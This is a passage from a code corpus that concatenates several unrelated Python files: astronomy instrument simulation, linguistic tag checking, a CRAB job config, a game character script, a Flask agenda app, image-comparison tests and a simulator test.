replenishment=dictionary['replenishment'])\n\n\ndef dict_to_storage(dictionary):\n return Storage(idx=dictionary['idx'], point_idx=dictionary['point_idx'], name=dictionary['name'],\n replenishment=dictionary['replenishment'], armor=dictionary['armor'], armor_capacity=dictionary['armor_capacity'])\n","sub_path":"json_converter.py","file_name":"json_converter.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"226654701","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nProvides Instrument class for simulations of DESI observations\n\"\"\"\nfrom __future__ import print_function, division\n\n\nimport os.path\nimport glob\nimport yaml\nimport numpy as np\nfrom astropy.io import fits\nimport scipy.interpolate\n\nimport specsim.spectrum\n\n\nclass Instrument(object):\n \"\"\"\n A class representing the DESI instrument for simulating observations\n \"\"\"\n def __init__(self,modelFilename=None,throughputPath=None,psfFile=None,basePath=''):\n \"\"\"\n Initializes an Instrument using parameters in the specified yaml model file,\n throughputs in the specified path, and psf parameters in the specified\n FITS file. If any filename or path is None, use a default relative to basePath.\n \"\"\"\n # Apply defaults if necessary.\n if modelFilename is None:\n modelFilename = os.path.join(basePath,'data','desi.yaml')\n if throughputPath is None:\n throughputPath = os.path.join(basePath,'data','throughput')\n if psfFile is None:\n psfFile = os.path.join(basePath,'data','specpsf','psf-quicksim.fits')\n # Load the model parameters from the specified YAML file.\n if not os.path.isfile(modelFilename):\n raise RuntimeError('No such yaml model file: %s' % modelFilename)\n with open(modelFilename) as stream:\n self.model = yaml.safe_load(stream)\n # Load the throughputs for each camera from the specified path.\n if not os.path.isdir(throughputPath):\n raise RuntimeError('No such throughput path: %s' % throughputPath)\n # Loop over cameras listed in the model.\n self.throughput = { }\n for camera in self.model['ccd']:\n # Try to open the throughput FITS file for this camera.\n hduList = fits.open(os.path.join(throughputPath,'thru-%s.fits' % camera))\n # Create linear interpolations of the wavelength and throughput columns\n # from the FITS table stored as HDU[1]. Values outside of the tabulated\n # wavelength range will silently extrapolate to zero.\n table = hduList[1].data\n self.throughput[camera] = specsim.spectrum.WavelengthFunction(\n table['wavelength'],table['throughput'], extrapolatedValue=0.)\n hduList.close()\n # Loop over fiberloss models present in the throughput directory.\n self.fiberloss = { }\n for fiberlossFile in glob.iglob(os.path.join(throughputPath,'fiberloss-*.dat')):\n # Extract the model name from the filename.\n model = os.path.basename(fiberlossFile)[10:-4]\n # Load the data from this file.\n self.fiberloss[model] = specsim.spectrum.WavelengthFunction.loadFromTextFile(\n fiberlossFile,extrapolatedValue=0.)\n # Open the PSF parameter file.\n hduList = fits.open(psfFile)\n # Loop over camera bands to build linear interpolations of the PSF FWHM in the\n # wavelength (Angstroms) and spatial (pixels) directions. We also build an\n # interpolation of the angstromsPerRow values needed to convert between pixels\n # and Angstroms in the wavelength direction.\n self.angstromsPerRow = { }\n self.psfFWHMWavelength = { }\n self.psfFWHMSpatial = { }\n self.psfNPixelsSpatial = { }\n self.cameraBands = self.model['ccd'].keys()\n self.cameraWavelengthRanges = [ ]\n cameraMidpt = [ ]\n for band in self.cameraBands:\n # Use a key of the form QUICKSIM-X where X identifies the camera band.\n # Note that FITS does not recognize unicode strings as keys so we must\n # explicity encode in 'ascii' here (or not import unicode_literals above).\n key = ('QUICKSIM-%s' % band.upper()).encode('ascii')\n table = hduList[key].data\n wave = table['wavelength']\n # Load tabulated PSF functions of wavelength.\n self.angstromsPerRow[band] = specsim.spectrum.WavelengthFunction(\n wave,table['angstroms_per_row'],extrapolatedValue=0.)\n self.psfFWHMWavelength[band] = specsim.spectrum.WavelengthFunction(\n wave,table['fwhm_wave'],extrapolatedValue=0.)\n self.psfFWHMSpatial[band] = specsim.spectrum.WavelengthFunction(\n wave,table['fwhm_wave'],extrapolatedValue=0.)\n self.psfNPixelsSpatial[band] = specsim.spectrum.WavelengthFunction(\n wave,table['neff_spatial'],extrapolatedValue=0.)\n # Get the wavelength limits for the camera from the FITS header.\n waveMin,waveMax = hduList[key].header['WMIN_ALL'],hduList[key].header['WMAX_ALL']\n assert waveMin == wave[0] and waveMax == wave[-1], (\n \"Inconsistent wavelength limits for %s\" % key)\n self.cameraWavelengthRanges.append((waveMin,waveMax))\n cameraMidpt.append(0.5*(waveMin+waveMax))\n hduList.close()\n # Sort the camera bands in order of increasing wavelength (blue to red). This info\n # is already encoded in the order in which the cameras appear in the YAML file, but\n # is not preserved a YAML parser, which views the 'ccd' record as a dictionary.\n self.cameraBands = [x for (y,x) in sorted(zip(cameraMidpt,self.cameraBands))]\n self.cameraWavelengthRanges = [x for (y,x) in sorted(zip(cameraMidpt,self.cameraWavelengthRanges))]\n\n def getSourceTypes(self):\n \"\"\"\n Returns a list of the source types for which we have a fiber loss model defined.\n \"\"\"\n return self.fiberloss.keys()\n\n def getCameraBands(self):\n \"\"\"\n Returns a list of the camera bands supported by this instrument, in order of\n increasing wavelength.\n \"\"\"\n return self.cameraBands\n","sub_path":"specsim/instrument.py","file_name":"instrument.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"94463876","text":"from msd_mapper import MSDMapper\nmapper=MSDMapper()\ntags={}\nfor line in open('mte5-udv2.mapping'):\n line=line.strip().split('\\t')\n upos='UposTag='+line[1]+'|'+line[3]\n if upos not in tags:\n tags[upos]=set()\n tags[upos].add(line[0])\n#print(tags)\n#sys.exit()\nf=open('hr500k.conll.uposxpos.txt','w')\nfor line in open('hr500k.conll'):\n if line.startswith('#') or line.startswith('\\n'):\n f.write(line)\n continue\n els=line.strip().split('\\t')\n upos=mapper.map_word(els[1], els[2], els[4])\n upos='UposTag='+upos[1]+'|'+upos[2]\n #print(upos,els[8])\n if els[8]==upos:\n f.write(line)\n continue\n if els[8] not in tags:\n print('UPOS',els[4],els[8])\n f.write('UPOS!!!\\t'+line)\n else:\n if els[4] not in tags[els[8]]:\n print('XPOS',els[4],els[8])\n f.write('XPOS!!!\\t'+line)\n else:\n print('LAST RESORT')\n f.write(line)\nf.close()","sub_path":"identify_upos_feats_mismatchs.py","file_name":"identify_upos_feats_mismatchs.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"177054277","text":"from WMCore.Configuration import Configuration\nconfig = Configuration()\n\nconfig.section_(\"User\")\nconfig.User.voGroup = 'dcms'\n\nconfig.section_(\"General\")\nconfig.General.requestName = 'JetData-RunB2017-v1'\nconfig.General.workArea = 'JetData-RunB2017-v1'\n\nconfig.section_(\"JobType\")\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'flatData-nanoNtuple-cfg.py'\nconfig.JobType.allowUndistributedCMSSW = True\n\nconfig.section_(\"Data\")\nconfig.Data.inputDataset = '/JetHT/Run2017B-31Mar2018-v1/MINIAOD'\nconfig.Data.splitting = 'LumiBased'\nconfig.Data.unitsPerJob = 100\nconfig.Data.lumiMask = 'Cert_294927-306462_13TeV_PromptReco_Collisions17_JSON.txt'\nconfig.Data.runRange = '294927-306462'\nconfig.Data.outputDatasetTag = 'CRAB3_JetData-RunB2017'\n\nconfig.section_(\"Site\")\nconfig.Site.storageSite = \"T2_DE_DESY\"\n","sub_path":"SMPJ/NTuplizer/test/crabMiniAODRunB.py","file_name":"crabMiniAODRunB.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545126059","text":"###############################################################################\n#\tFilename:\tSaffi.py\n#\t\n#\tConfidential and Proprietary, Copyright 2000 by Totally Games\n#\t\n#\tLoads Saffi Larsen, XO, and configures animations.\n#\t\n#\tCreated:\t3/28/00 -\tErik Novales\n###############################################################################\n\nimport App\nimport CharacterPaths\n\n#NonSerializedObjects = ( \"debug\", )\n\n#debug = App.CPyDebug(__name__).Print\n\n###############################################################################\n#\tCreateCharacter()\n#\n#\tCreate Saffi by building her character and placing her on the passed in set.\n#\tCreate her menus as well.\n#\n#\tArgs:\tpSet\t- the Set in which to place ourselves\n#\n#\tReturn:\tnone\n###############################################################################\ndef CreateCharacter(pSet):\n#\tdebug(\"Creating Saffi\")\n\n\tif (pSet.GetObject(\"XO\") != None):\n\t\treturn(App.CharacterClass_Cast(pSet.GetObject(\"XO\")))\n\tCharacterPaths.UpdatePaths()\n\t# Create the character\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", \"Bip01\")\n\tApp.g_kModelManager.LoadModel(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", None)\n\tpSCPSaffi = App.CharacterClass_Create(CharacterPaths.g_pcBodyNIFPath + \"BodyFemM/BodyFemM.nif\", CharacterPaths.g_pcHeadNIFPath + \"../BridgeCrew/borgqueen/borgqueen_head.nif\", 1)\n\tpSCPSaffi.ReplaceBodyAndHead(CharacterPaths.g_pcBodyTexPath + \"../BridgeCrew/borgqueen/borgqueen_body.tga\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\n\tpSCPSaffi.SetCharacterName(\"Saffi\")\n\n\t# Add the character to the set\n\tpSet.AddObjectToSet(pSCPSaffi, \"XO\")\n\tpLight = pSet.GetLight(\"ambientlight1\")\n\tpLight.AddIlluminatedObject(pSCPSaffi)\n\n\t# Setup the character configuration\n\tpSCPSaffi.SetSize(App.CharacterClass.MEDIUM)\n\tpSCPSaffi.SetGender(App.CharacterClass.FEMALE)\n\tpSCPSaffi.SetRandomAnimationChance(.75)\n\tpSCPSaffi.SetBlinkChance(0.1)\n\tpSCPSaffi.SetDatabase(\"data/TGL/Bridge Crew General.tgl\")\n\n\t# Load Saffi's general dialogue lines.\n\tLoadSounds()\n\n\tpSCPSaffi.AdSCPacialImage(\"Blink0\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"Blink1\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"Blink2\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.SetBlinkStages(3)\n\n\tpSCPSaffi.AdSCPacialImage(\"SpeakA\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"SpeakE\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.AdSCPacialImage(\"SpeakU\", CharacterPaths.g_pcHeadTexPath + \"../BridgeCrew/borgqueen/borgqueen_head.tga\")\n\tpSCPSaffi.SetAnimatedSpeaking(1)\n\n\tpMenusDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Menus.tgl\")\n\tpTop = App.TopWindow_GetTopWindow()\n\tpTacticalControlWindow = App.TacticalControlWindow_GetTacticalControlWindow()\n\tpSCPSaffi.SetMenu(pTacticalControlWindow.FindMenu(pMenusDatabase.GetString(\"Commander\")))\n\tApp.g_kLocalizationManager.Unload(pMenusDatabase)\n\n#\tdebug(\"Finished creating Saffi\")\n\treturn pSCPSaffi\n\n\n###############################################################################\n#\tConfigureForShip()\n#\n#\tConfigure ourselves for the particular ship object. This involves setting\n#\tup range watchers that tell us how to report.\n#\n#\tArgs:\tpSet\t- the Set object\n#\t\t\tpShip\t- the player's ship (ShipClass object)\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForShip(pSet, pShip):\n\t# Get our character object\n\tpSCPSaffi = App.CharacterClass_Cast(pSet.GetObject(\"XO\"))\n\tif (pSCPSaffi == None):\n#\t\tdebug(\"******* Commanding officer not found *********\")\n\t\treturn\n\n#\tdebug(\"Attaching menu to XO..\")\n\timport Bridge.XOCharacterHandlers\n\tBridge.XOCharacterHandlers.AttachMenuToXO(pSCPSaffi)\n\n\t#\n\t# This is where code to set up responses based on the ships state\n\t# e.g. \"Main power back on line\"\n\t#\n\n###############################################################################\n#\tConfigureForGalor()\n#\n#\tConfigure ourselves for the Galor bridge\n#\n#\tArgs:\tpSCPSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef ConfigureForGalor(pSCPSaffi):\n#\tdebug(\"Configuring Saffi for the Galor bridge\")\n\n\t# Clear out any old animations from another configuration\n\tpSCPSaffi.ClearAnimations()\n\n\t# Register animation mappings\n\tpSCPSaffi.AddAnimation(\"SeatedSCPCommander\", \"Bridge.Characters.SCPMediumAnimations.SCPPlaceAtC\")\n\tpSCPSaffi.AddAnimation(\"StandingSCPCommander\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tpSCPSaffi.AddAnimation(\"EBL1MToEBCommander\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromL1ToC\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderToL1\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromCToL1\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderToC1\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromCToC1\")\n\tpSCPSaffi.AddAnimation(\"EBCommander1ToC\", \"Bridge.Characters.SCPMediumAnimations.EBMoveFromC1ToC\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderTurnCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPTurnAtCTowardsCaptain\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderBackCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPTurnBackAtCFromCaptain\")\n\n\tpSCPSaffi.AddAnimation(\"SCPCommanderGlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderGlanceAwayCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1GlanceCaptain\", \"Bridge.Characters.CommonAnimations.GlanceRight\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1GlanceAwayCaptain\", \"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\")\n\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnE\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkE\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackE\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnH\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkH\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackH\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnT\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkT\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackT\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurnS\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkS\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackS\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\n\tpSCPSaffi.AddAnimation(\"EBCommanderTurSCP\", \"Bridge.Characters.SCPMediumAnimations.EBCTalkE\")\n\tpSCPSaffi.AddAnimation(\"EBCommanderBackX\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\n\t# Breathing\n\tpSCPSaffi.AddAnimation(\"SCPCommanderBreathe\", \"Bridge.Characters.SCPMediumAnimations.SCPseatedm\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1Breathe\", \"Bridge.Characters.CommonAnimations.Standing\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderBreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\tpSCPSaffi.AddAnimation(\"SCPCommander1BreatheTurned\", \"Bridge.Characters.CommonAnimations.BreathingTurned\")\n\n\t# Interaction\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\", App.CharacterClass.SITTING_ONLY, 25, 1)\n\tpSCPSaffi.AddAnimation(\"PushingButtons\", \"Bridge.Characters.SCPMediumAnimations.SCPCConsoleInteraction\")\n\n\t# Hit animations\n\t#pSCPSaffi.AddAnimation(\"SCPCommanderHit\", \"Bridge.Characters.SCPMediumAnimations.SCPCHit\")\n\t#pSCPSaffi.AddAnimation(\"SCPCommanderHitHard\", \"Bridge.Characters.SCPMediumAnimations.SCPCHitHard\")\n\t#pSCPSaffi.AddAnimation(\"EBCommanderHitStanding\", \"Bridge.Characters.CommonAnimations.HitStanding\")\n\t#pSCPSaffi.AddAnimation(\"EBCommanderHitHardStanding\", \"Bridge.Characters.CommonAnimations.HitHardStanding\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderReactLeft\", \"Bridge.Characters.CommonAnimations.ReactLeft\")\n\tpSCPSaffi.AddAnimation(\"SCPCommanderReactRight\", \"Bridge.Characters.CommonAnimations.ReactRight\")\n\n\t# Add common animations.\n\tAddCommonAnimations(pSCPSaffi)\n\tpSCPSaffi.SetStanding(0)\n\tpSCPSaffi.SetLocation(\"SCPCommander\")\n\tpSCPSaffi.AddPositionZoom(\"SCPCommander\", 0.4)\n#\tdebug(\"Finished configuring Saffi\")\n\n###############################################################################\n#\tAddCommonAnimations()\n#\n#\tSince we can only clear out all animations when switching bridges (how\n#\twould we know which not to clear?), we can't really setup animations common\n#\tto all bridge configurations as we might like. Because of this we have a\n#\troutine to add common animations (most of which are randoms) that both\n#\tconfigurations will call\n#\n#\tArgs:\tpSCPSaffi\t- our Character object\n#\n#\tReturn:\tnone\n###############################################################################\ndef AddCommonAnimations(pSCPSaffi):\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.SCPMediumAnimations.CLookAroundConsoleDown\", App.CharacterClass.SITTING_ONLY, 1, 1)\n\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadLeft\")\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.TiltHeadRight\")\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookLeft\", App.CharacterClass.SITTING_ONLY)\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookRight\", App.CharacterClass.SITTING_ONLY)\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookUp\", App.CharacterClass.SITTING_ONLY)\n\tpSCPSaffi.AddRandomAnimation(\"Bridge.Characters.CommonAnimations.LookDown\", App.CharacterClass.SITTING_ONLY)\n\n###############################################################################\n#\tLoadSounds\n#\t\n#\tLoad any of Saffi's general or spontaneous sounds, so they don't\n#\thitch the game when they're played.\n#\t\n#\tArgs:\tNone\n#\t\n#\tReturn:\tNone\n###############################################################################\ndef LoadSounds():\n\tpGame = App.Game_GetCurrentGame()\n\tpDatabase = App.g_kLocalizationManager.Load(\"data/TGL/Bridge Crew General.tgl\")\n\t\n\t#\n\t# Build a list of sound to load\n\t#\n\tlSoundList =\t[\n\t\t# Yes?\n\t\t\"gf001\",\n\t\t\"gf002\",\n\n\t\t# Report.\n\t\t\"gf020\",\n\n\t\t# Alert lines.\n\t\t\"GreenAlert\",\n\t\t\"GreenAlert2\",\n\t\t\"GreenAlert3\",\n\t\t\"YellowAlert\",\n\t\t\"YellowAlert3\",\n\t\t\"YellowAlert2\",\n\t\t\"RedAlert\",\n\t\t\"RedAlert2\",\n\n\t\t# Contacting starfleet.\n\t\t\"gl004\",\n\t\t\"gl005\",\n\t\t\t\t\t]\n\t#\n\t# Loop through that list, loading each sound in the \"BridgeGeneric\" group\n\t#\n\tfor sLine in lSoundList:\n\t\tpGame.LoadDatabaseSoundInGroup(pDatabase, sLine, \"BridgeGeneric\")\n\n\tApp.g_kLocalizationManager.Unload(pDatabase)\n","sub_path":"scripts/Bridge/Characters/SCPSaffi.py","file_name":"SCPSaffi.py","file_ext":"py","file_size_in_byte":10682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536052598","text":"# *Projet Data-Engineering E4 \r\n\r\nfrom flask import Flask, render_template, redirect\r\nfrom pymongo import MongoClient\r\nfrom classes import *\r\n\r\n# Configuration du systeme\r\napp = Flask(__name__)\r\napp.config.update(dict(SECRET_KEY='maclesecrete'))\r\nclient = MongoClient('localhost:27017')\r\ndb = client.TaskManager\r\n\r\nif db.settings.find({'name': 'task_id'}).count() <= 0:\r\n print(\"Tache non trouvee...\")\r\n db.settings.insert_one({'name':'task_id', 'value':0})\r\n\r\ndef modifID(value): # fonction permettant de donner un ID à chaque évenement de manière croissante\r\n task_id = db.settings.find_one()['value']\r\n task_id += value\r\n db.settings.update_one(\r\n {'name':'task_id'},\r\n {'$set':\r\n {'value':task_id}\r\n })\r\n\r\ndef rdvCreate(form): #fonction permettant la création d'un nouvel évenement\r\n date = form.date.data\r\n heure = form.heure.data\r\n description = form.description.data\r\n task_id = db.settings.find_one()['value']\r\n \r\n task = {'id':task_id, 'date':date, 'description':description, 'heure':heure}\r\n\r\n db.tasks.insert_one(task)\r\n modifID(1)\r\n return redirect('/')\r\n\r\ndef rdvSupprimer1(form): # fonction permettant de supprimer n'importe quel évenement en introduisant son ID\r\n id = form.id.data\r\n if(id):\r\n print(id, type(id))\r\n db.tasks.delete_many({'id':int(id)})\r\n\r\n return redirect('/')\r\n\r\ndef rdvModifier(form): # fonction permettant de modifier la description d'un évenement en introduisant son ID\r\n id = form.id.data\r\n description = form.description.data\r\n \r\n db.tasks.update_one(\r\n {\"id\": int(id)},\r\n {\"$set\":\r\n {\"description\": description}\r\n }\r\n )\r\n\r\n return redirect('/')\r\n\r\ndef reinit_tache(form): # reinitialisation de la liste des évenements de l'agenda\r\n db.tasks.drop()\r\n db.settings.drop()\r\n db.settings.insert_one({'name':'task_id', 'value':0})\r\n return redirect('/')\r\n\r\n@app.route('/', methods=['GET','POST'])\r\ndef main():\r\n # Création de chaque bloc d'évenements'\r\n cform = RdvCreate(prefix='cform')\r\n dform = RdvSupprimer(prefix='dform')\r\n uform = RdvModifier(prefix='uform')\r\n reinit = Reinit(prefix='reinit')\r\n\r\n # Réponses de chaque requête\r\n if cform.validate_on_submit() and cform.creer.data:\r\n return rdvCreate(cform)\r\n if dform.validate_on_submit() and dform.supprimer.data:\r\n return rdvSupprimer1(dform)\r\n if uform.validate_on_submit() and uform.modifier.data:\r\n return rdvModifier(uform)\r\n if reinit.validate_on_submit() and reinit.reinit.data:\r\n return reinit_tache(reinit)\r\n\r\n # Lecture de toutes les données\r\n docs = db.tasks.find()\r\n data = []\r\n for i in docs:\r\n data.append(i)\r\n\r\n return render_template('home.html', cform = cform, dform = dform, uform = uform, \\\r\n data = data, reinit = reinit) # on retourne les données de chaques évenements\r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"369300476","text":"'''\n@note:\n This script tests various methods from the mail run.py script \n to ensure proper output and image comparison\n'''\n\nimport unittest\nfrom skimage.measure import compare_ssim as ssim\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2 as cv\nimport sys\nimport os\nimport types\nfrom scipy.stats import wasserstein_distance\nfrom PIL import Image\nfrom abc import ABCMeta, abstractmethod\nfrom algorithm import *\nfrom run import *\n\nlocate = \"./test_image_folder/\"\nentries = os.listdir(locate)\n# select a simulation and a non related galaxy\nimage1 = entries[0]\nimage2 = entries[1]\n\n# load the images, resize and covert to grayscale\nimage1 = cv.imread(locate + image1)\nimage1 = cv.resize(image1, (1000, 1000))\nimage1 = cv.cvtColor(image1, cv.COLOR_BGR2GRAY)\n\nimage2 = cv.imread(locate + image2)\nimage2 = cv.resize(image2, (1000, 1000))\nimage2 = cv.cvtColor(image2, cv.COLOR_BGR2GRAY)\n\nimageA = image1\nimageB = image1\nimageC = image2\n\n\nclass TestRunAndAlgorithmScriptMethods(unittest.TestCase):\n '''\n @note: \n class which runs unit tests on all methods that start with 'test'\n @yields:\n the results of the tests\n '''\n\n LOCATION = \"\"\n \n def test_PercentDifference(self):\n \n '''\n @note: \n tests the Percent Difference algorithm\n @yields:\n the percent difference between images, the smaller the percent\n the more similar the images are to each other with 0 being\n a result of idential images. \n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. if different images return a value not equal 0\n '''\n\n imageA = entries[0]\n imageB = entries[0]\n imageC = entries[2]\n\n difference = Context(PercentDifference())\n difference_equal = difference.calculate(locate+imageA, locate+imageB)\n difference_not_equal = difference.calculate(locate+imageA, locate+imageC)\n \n self.assertEqual(difference_equal, 0)\n self.assertNotEqual(difference_not_equal, 0)\n\n def test_EartMovers(self):\n '''\n @note: \n tests the Earth Mover's algorithm\n @yields:\n a value which represents the amount of work need to do\n to transform one image into the other, the smaller the\n returned value the more similar the images are \n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. if different images return a value not equal 0\n '''\n\n emd = Context(EarthMovers())\n emd_equal = emd.calculate(imageA, imageB)\n emd_not_equal = emd.calculate(imageA, imageC)\n\n self.assertEqual(emd_equal, 0)\n self.assertNotEqual(emd_not_equal, 0)\n\n def test_Ssim(self):\n '''\n @note: \n tests the Earth Mover's algorithm\n @yields:\n a value which represents the amount of work need to do\n to transform one image into the other, the smaller the\n returned value the more similar the images are \n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. if different images return a value not equal 0\n '''\n\n ssim = Context(Ssim())\n ssim_equal = ssim.calculate(imageA, imageB)\n ssim_not_equal = ssim.calculate(imageA, imageC)\n\n self.assertEqual(ssim_equal, 1.0)\n self.assertNotEqual(ssim_not_equal, 1.0)\n\n def test_Mse(self):\n '''\n @note: \n tests the Mean Squared Error algorithm\n @yields:\n a value which represents the amount of difference present\n between two images. The higher the return the higher the\n difference between images where 0 indicates identical \n images\n \n Here we assert two things:\n 1. if identical images return a value of 0\n 2. if different images return a value not equal 0\n '''\n\n mse = Context(Mse())\n mse_equal = mse.calculate(imageA, imageB)\n mse_not_equal = mse.calculate(imageA, imageC)\n\n self.assertEqual(mse_equal, 0)\n self.assertNotEqual(mse_not_equal, 0)\n \n def test_test_system_match(self):\n '''\n @note: \n tests the method which tests various images and applies\n the various algorithms described above. More specifically,\n we are seeing if the system returns a match when it should\n @yields:\n a tally of total matches, total differences, total comparisons,\n and total wrong choices done by the system\n \n Here we assert four things if there is a match then:\n 1. total matches should equal 1\n 2. total differences should equal 0\n 3. total comparisons should equal 1\n 4. total wrong should equal 0\n '''\n\n values = [4000, 0.1, 0.004, 30]\n #location = \"./test_image_folder/\"\n results = test_system(\"test01_sim_m31\", \"M31(2)\", values, True, False, locate)\n\n total_matches = results[0][0]\n total_different = results[0][1]\n total_comparisons = results[0][2]\n total_wrong = results[0][3]\n\n self.assertEqual(total_matches, 1)\n self.assertEqual(total_different, 0)\n self.assertEqual(total_comparisons, 1)\n self.assertEqual(total_wrong, 0)\n\n def test_test_system_mismatch(self):\n '''\n @note: \n tests the method which tests various images and applies\n the various algorithms described above. More specifically,\n we are seeing if the system returns a mismatch when it should\n @yields:\n a tally of total matches, total differences, total comparisons,\n and total wrong choices done by the system\n\n important to note that the system resumes where the previous\n method left off and as such the base values for match, difference,\n comparisons, and wrong are 1,0,1,0 not 0,0,0,0\n \n Here we assert four things if there is a mismatch then:\n 1. total matches should equal 1\n 2. total differences should equal 1\n 3. total comparisons should equal 2\n 4. total wrong should equal 0\n '''\n \n values = [4000, 0.1, 0.004, 30]\n #location = sys.argv[2]\n results = test_system(\"test01_sim_m31\", \"M81\", values, True, False, locate)\n\n total_matches = results[0][0]\n total_different = results[0][1]\n total_comparisons = results[0][2]\n total_wrong = results[0][3]\n\n self.assertEqual(total_matches, 1)\n self.assertEqual(total_different, 1)\n self.assertEqual(total_comparisons, 2)\n self.assertEqual(total_wrong, 0)\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"487139769","text":"import numpy as np\n\nfrom matplotlib import pyplot as plt\n\nimport snc.simulation.plot.plotting_utils\nfrom snc.environments import examples\nfrom snc.agents.hedgehog.hh_agents.big_step_hedgehog_agent import BigStepHedgehogAgent\nimport snc.simulation.snc_simulator as ps\nimport snc.simulation.plot.plotting_handlers as hand\nimport snc.simulation.store_data.reporter as rep\nimport snc.simulation.utils.load_agents as load_agents\n\n\ndef build_default_simple_reentrant_line_simulator(seed):\n \"\"\"\n Helper function that returns a simulator to be used by the tests below.\n \"\"\"\n\n env = examples.simple_reentrant_line_model(job_gen_seed=seed)\n overrides = {}\n ac_params, wk_params, si_params, po_params, hh_params, si_class, dp_params, name \\\n = load_agents.get_hedgehog_hyperparams(**overrides)\n\n # Create Policy Simulator\n discount_factor = 0.95\n agent = BigStepHedgehogAgent(env, discount_factor, wk_params, hh_params, ac_params, si_params,\n po_params, si_class, dp_params, name)\n return ps.SncSimulator(env, agent, discount_factor=discount_factor)\n\n\ndef test_live_plotting_to_existing_axes():\n \"\"\"Test live plotting works on existing axes.\"\"\"\n\n seed = 42\n np.random.seed(seed)\n num_simulation_steps = 30\n time_interval = 1\n plot_frequency = 10\n\n hedgehog_simulator = 